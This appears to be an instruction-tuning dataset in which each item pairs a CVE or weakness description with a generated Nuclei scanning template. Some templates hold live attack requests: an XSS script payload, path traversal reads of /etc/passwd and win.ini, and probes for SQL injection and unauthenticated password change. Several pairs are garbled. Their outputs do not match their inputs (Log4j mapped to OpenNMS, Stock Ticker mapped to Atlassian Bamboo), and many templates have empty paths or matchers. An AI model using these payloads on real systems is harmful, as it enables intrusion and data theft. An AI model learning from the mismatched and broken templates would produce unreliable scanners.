panel,netsparker,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/account/signin?ReturnUrl=%2f\" \n matchers:\n - type: word\n words:\n - \"Netsparker Ltd\" \n - \"Netsparker Enterprise\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Wpdm-Cache Session", "input": "Title: Wpdm-Cache Session\nSummary: Wpdm-Cache Session. Leaked session of Wpdm Cache wordpress plugin.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: wpdm-cache-session\n\ninfo:\n name: Wpdm-Cache Session\n author: dhiyaneshDk\n severity: medium\n description: Leaked session of Wpdm Cache wordpress plugin.\n tags: wordpress,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/uploads/wpdm-cache/\" \n matchers:\n - type: word\n words:\n - \"Index of /\" \n - \".txt\" \n - \"wpdm-cache\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "wpdm-cache-session"} +{"instruction": "Generate a Nuclei template for CVE-2021-44228", "input": "Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others\nSummary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware\nIndicators: error, vulnerability detected", "output": "id: opennms-log4j-rce\n\ninfo:\n name: OpenNMS - JNDI Remote Code Execution (Apache Log4j)\n author: johnk3r\n severity: critical\n description: OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2021-44228"} +{"instruction": "Generate a Nuclei template for: Google Cloud Functions Using Default Service Account", "input": "Title: Google Cloud Functions Using Default Service Account\nSummary: Google Cloud Functions Using Default Service Account. Ensure that your Google Cloud functions are configured to use user-managed service accounts instead of the default service account managed by Google Cloud in order to follow the Principle of Least Privilege (POLP) and enhance the security posture of your functions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcp-func-default-svc-acc\n\ninfo:\n name: Google Cloud Functions Using Default Service Account\n author: princechaddha\n severity: medium\n description: Ensure that your Google Cloud functions are configured to use user-managed service accounts instead of the default service account managed by Google Cloud in order to follow the Principle of Least Privilege (POLP) and enhance the security posture of your functions.\n tags: cloud,devops,gcp,gcloud,google-cloud-functions,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcp-func-default-svc-acc"} +{"instruction": "Generate a Nuclei template for CVE-2022-31847", "input": "Title: Vulnerability (CWE-425) in wavlink wn579x3_firmware\nSummary: A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.\nVulnerability Type: Vulnerability (CWE-425)\nSeverity: high\nAffected Products: wavlink wn579x3_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-31847\n\ninfo:\n name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure\n author: arafatansari\n severity: high\n description: WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,wavlink,exposure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\" \n matchers:\n - type: word\n words:\n - \"Login=\" \n - \"Password=\" \n - \"Model=\" \n - \"AuthMode=\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-31847"} +{"instruction": "Generate a Nuclei template for CVE-2020-24312", "input": "Title: Vulnerability (CWE-552) in filemanagerpro file_manager\nSummary: mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: high\nAffected Products: filemanagerpro file_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-24312\n\ninfo:\n name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure\n author: x1m_martijn\n severity: high\n description: mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\n tags: cve,cve2020,wordpress,backups,plugin,webdesi9,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/\" \n matchers:\n - type: word\n words:\n - \"Index of\" \n - \"wp-content/uploads/wp-file-manager-pro/fm_backup\" \n - \"backup_\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-24312"} +{"instruction": "Generate a Nuclei template for CVE-2025-29927", "input": "Title: Vulnerability (CWE-285) in vercel next.js\nSummary: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.\nVulnerability Type: Vulnerability (CWE-285)\nSeverity: critical\nAffected Products: vercel next.js\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-29927\n\ninfo:\n name: Next.js Middleware Bypass\n author: pdresearch,pdteam,hazedic\n severity: critical\n description: Next.js contains a critical middleware bypass vulnerability affecting versions 11.1.4 through 15.2.2.\nThe vulnerability allows attackers to bypass middleware security controls by sending a specially crafted\n'x-middleware-subrequest' header, which can lead to authorization bypass and other security control circumvention.\n tags: cve,cve2025,nextjs,middleware,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 307\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}{{endpoints}}\" \n matchers:\n - type: dsl\n - method: GET\n path:\n - \"{{BaseURL}}{{endpoints}}\" \n matchers:\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2025-29927"} +{"instruction": "Generate a Nuclei template for: Google FCM API Test", "input": "Title: Google FCM API Test\nSummary: Google FCM API Test. Tags: token-spray, google, fcm\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googlefcm\n\ninfo:\n name: Google FCM API Test\n author: zzeitlin\n severity: info\n description: Google FCM API Test\n tags: token-spray,google,fcm,firebase,cloud,messaging\n\nhttp:\n - method: POST\n path:\n - \"https://fcm.googleapis.com/fcm/send\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "api-googlefcm"} +{"instruction": "Generate a Nuclei template for: vBulletin - Full Path Disclosure", "input": "Title: vBulletin - Full Path Disclosure\nSummary: vBulletin - Full Path Disclosure. Tags: config, exposure, fpd\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: vbulletin-path-disclosure\n\ninfo:\n name: vBulletin - Full Path Disclosure\n author: MaStErChO\n severity: info\n description: vBulletin - Full Path Disclosure\n tags: config,exposure,fpd,vbulletin,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"vBulletin\" \n part: body\n - method: GET\n path:\n - \"{{BaseURL}}/forumdisplay.php?do[]=[test.dll]\" \n - \"{{BaseURL}}/calendar.php?do[]=[test.dll]\" \n - \"{{BaseURL}}/search.php?do[]=[test.dll]\" \n - \"{{BaseURL}}/forumrunner/include/album.php\" \n - \"{{BaseURL}}/core/vb5/route/channel.php\" \n - \"{{BaseURL}}/core/vb5/route/conversation.php\" \n - \"{{BaseURL}}/includes/api/interface/noncollapsed.php\" \n - \"{{BaseURL}}/includes/api/interface/collapsed.php\" \n - \"{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba.php\" \n - \"{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba_links.php\" \n matchers:\n - type: word\n words:\n - \"Warning:\" \n - \"Cannot modify header information\" \n - \"/strong> on line\" \n - \"trim() expects parameter\" \n - \"class_core.php\" \n - \"header already sent\" \n - \"Fatal error\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "vbulletin-path-disclosure"} +{"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: dedecms-config-xss\n\ninfo:\n name: DedeCMS 5.7 - Cross-Site Scripting\n author: ritikchaddha\n severity: high\n description: DeDeCMS 5.7 contains a cross-site scripting vulnerability in the '/include/dialog/config.php' file. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.\n tags: dedecms,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"location='../../\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-79"} +{"instruction": "Generate a Nuclei template for: New Relic License Key", "input": "Title: New Relic License Key\nSummary: New Relic License Key. Tags: newrelic, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: newrelic-license-key\n\ninfo:\n name: New Relic License Key\n author: DhiyaneshDK\n severity: info\n description: New Relic License Key\n tags: newrelic,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "newrelic-license-key"} +{"instruction": "Generate a Nuclei template for CVE-2023-26842", "input": "Title: Cross-Site Scripting (XSS) in churchcrm churchcrm\nSummary: A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: churchcrm churchcrm\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-26842\n\ninfo:\n name: ChurchCRM 4.5.3 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-26842"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sql-monitor\n\ninfo:\n name: SQL Monitor - Discovery\n author: dhiyaneshDK\n severity: info\n description: SQL Monitor was discovered.\n tags: panel,red-gate,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True\" \n matchers:\n - type: word\n words:\n - \"

JavaScript needs to be enabled for SQL Monitor to work properly.

\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Sentry Access Token", "input": "Title: Sentry Access Token\nSummary: Sentry Access Token. Tags: sentry, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sentry-access-token\n\ninfo:\n name: Sentry Access Token\n author: DhiyaneshDK\n severity: info\n description: Sentry Access Token\n tags: sentry,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sentry-access-token"} +{"instruction": "Generate a Nuclei template for CVE-2021-40972", "input": "Title: Cross-Site Scripting (XSS) in spotweb_project spotweb\nSummary: Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: spotweb_project spotweb\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-40972\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\n tags: cve,cve2021,xss,spotweb,spotweb_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"onclick='alert(document.domain)\" \n - \"Spotweb\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-40972"} +{"instruction": "Generate a Nuclei template for CVE-2023-39650", "input": "Title: SQL Injection in themevolty theme_volty_cms_blog\nSummary: Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: themevolty theme_volty_cms_blog\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39650\n\ninfo:\n name: PrestaShop Theme Volty CMS Blog - SQL Injection\n author: mastercho\n severity: critical\n description: In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.\n tags: time-based-sqli,cve,cve2023,prestashop,sqli,tvcmsblog,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-39650"} +{"instruction": "Generate a Nuclei template for: Particle Cloud API Test", "input": "Title: Particle Cloud API Test\nSummary: Particle Cloud API Test. Tags: token-spray, particle\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-particle\n\ninfo:\n name: Particle Cloud API Test\n author: dwisiswant0\n severity: info\n description: Particle Cloud API Test\n tags: token-spray,particle\n\nhttp:\n - method: GET\n path:\n - \"https://api.particle.io/v1/user?access_token={{token}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"account_info\":\" \n - \"\"username\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-particle"} +{"instruction": "Generate a Nuclei template for CVE-2022-26148", "input": "Title: Vulnerability (CWE-312) in grafana grafana and others\nSummary: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\nVulnerability Type: Vulnerability (CWE-312)\nSeverity: critical\nAffected Products: grafana grafana, redhat ceph_storage, redhat storage\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-26148\n\ninfo:\n name: Grafana & Zabbix Integration - Credentials Disclosure\n author: Geekby\n severity: critical\n description: Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n tags: cve,cve2022,grafana,zabbix,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redirect=%2F\" \n matchers:\n - type: word\n words:\n - \"\"zabbix\":\" \n - \"\"zbx\":\" \n - \"alexanderzobnin-zabbix-datasource\" \n part: body\n condition: or\n - type: regex\n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-26148"} +{"instruction": "Generate a Nuclei template for CVE-2024-12824", "input": "Title: Vulnerability (CWE-620) in CVE-2024-12824\nSummary: The Nokri \u2013 Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.\nVulnerability Type: Vulnerability (CWE-620)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-12824\n\ninfo:\n name: Nokri \u2013 Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: The Nokri \u2013 Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.\n tags: cve,cve2024,intrusive,nokri,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"1|Password Changed successfully.\" \n part: body\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-admin\" \n - \"wordpress_logged_in\" \n part: header\n condition: and\n - type: status\n status:\n - 302", "category": "cve", "severity": "critical", "id": "CVE-2024-12824"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: digitalrebar-login\n\ninfo:\n name: RackN Digital Rebar Login Panel - Detect\n author: c-sh0\n severity: info\n description: RackN Digital Rebar login panel was detected.\n tags: rackn,digitalrebar,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/ui\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Digital Rebar\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting", "input": "Title: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting\nSummary: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting. WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: wpml-xss\n\ninfo:\n name: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting\n author: bugvsme\n severity: medium\n description: WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter.\n tags: xss,wp,wordpress,wpml,wp-plugin,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-login.php?wp_lang=en_US%27\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"#039;\"=\" \n - \"wpml_lang\" \n part: body\n condition: and", "category": "generic", "severity": "medium", "id": "wpml-xss"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fuji-xerox-printer-detect\n\ninfo:\n name: Fuji Xerox Printer Panel - Detect\n author: gy741\n severity: info\n description: Fuji Xerox printer panel was detected.\n tags: iot,panel,fuji,printer,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hdstat.htm\" \n matchers:\n - type: word\n words:\n - \"Fuji Xerox Co., Ltd\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2022-45365", "input": "Title: Cross-Site Scripting (XSS) in urosevic stock_ticker\nSummary: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aleksandar Uro\u0161evi\u0107 Stock Ticker allows Reflected XSS.This issue affects Stock Ticker: from n/a through 3.23.2.\n\n\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: urosevic stock_ticker\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-45365\n\ninfo:\n name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting\n author: theamanrawat\n severity: medium\n description: The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss,urosevic,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Stock Ticker Fatal\" \n - \"Log in as a Bamboo user\" \n - \"content=\"Bamboo\" \n - \"atlassian.bamboo.plugins\" \n - \"Atlassian Bamboo\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "atlassian-bamboo-panel"} +{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: alphaweb-default-login\n\ninfo:\n name: AlphaWeb XE Default Login\n author: Lark Lab\n severity: medium\n description: An AlphaWeb XE default login was discovered.\n tags: default-login,AlphaWeb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"HW Configuration\" \n - \"SW Configuration\" \n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} +{"instruction": "Generate a Nuclei template for CVE-2024-32964", "input": "Title: Vulnerability (CWE-918) in lobehub lobe_chat\nSummary: Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: lobehub lobe_chat\nIndicators: unauthorized", "output": "id: CVE-2024-32964\n\ninfo:\n name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery\n author: s4e-io\n severity: critical\n description: Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n tags: cve,cve2024,lobechat,ssrf,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"

Interactsh Server

\" \n part: response", "category": "cve", "severity": "critical", "id": "CVE-2024-32964"} +{"instruction": "Generate a Nuclei template for CVE-2025-34031", "input": "Title: Vulnerability (CWE-20) in geoffrowland jmol\nSummary: A path traversal vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the query parameter in jsmol.php. The script directly passes user input to the file_get_contents() function without proper validation, allowing attackers to read arbitrary files from the server's filesystem by crafting a malicious query value. This vulnerability can be exploited without authentication and may expose sensitive configuration data, including database credentials.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: high\nAffected Products: geoffrowland jmol\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-34031\n\ninfo:\n name: Moodle Jmol Filter 6.1 - Local File Inclusion\n author: madrobot\n severity: high\n description: Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server.\n tags: cve,cve2025,moodle,lfi,edb,jsmol,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"text/plain\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2025-34031"} +{"instruction": "Generate a Nuclei template for CVE-2019-14251", "input": "Title: Path Traversal in temenos t24\nSummary: An issue was discovered in T24 in TEMENOS Channels R15.01. The login page presents JavaScript functions to access a document on the server once successfully authenticated. However, an attacker can leverage downloadDocServer() to traverse the file system and access files or directories that are outside of the restricted directory because WealthT24/GetImage is used with the docDownloadPath and uploadLocation parameters.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: temenos t24\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-14251\n\ninfo:\n name: T24 Web Server - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.\n tags: cve,cve2019,temenos,lfi,unauth,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd\" \n - \"{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini\" \n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-14251"} +{"instruction": "Generate a Nuclei template for: Subrion CMS Web Installer - Exposure", "input": "Title: Subrion CMS Web Installer - Exposure\nSummary: Subrion CMS Web Installer - Exposure. Subrion CMS Web Installer has been exposed.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: subrion-installer\n\ninfo:\n name: Subrion CMS Web Installer - Exposure\n author: ritikchaddha\n severity: high\n description: Subrion CMS Web Installer has been exposed.\n tags: subrion,cms,install,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/\" \n matchers:\n - type: word\n words:\n - \"Subrion CMS Web Installer\" \n - \"Installation wizard\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "subrion-installer"} +{"instruction": "Generate a Nuclei template for: Synology RackStation Login Detect", "input": "Title: Synology RackStation Login Detect\nSummary: Synology RackStation Login Detect. Tags: login, tech, synology\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: synology-rackstation-login\n\ninfo:\n name: Synology RackStation Login Detect\n author: princechaddha\n severity: info\n description: Synology RackStation Login Detect\n tags: login,tech,synology,rackstation,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Synology RackStation\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "synology-rackstation-login"} +{"instruction": "Generate a Nuclei template for: SAUTER moduWeb Vision Panel - Detect", "input": "Title: SAUTER moduWeb Vision Panel - Detect\nSummary: SAUTER moduWeb Vision Panel - Detect. Sauter moduWeb Vision was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: 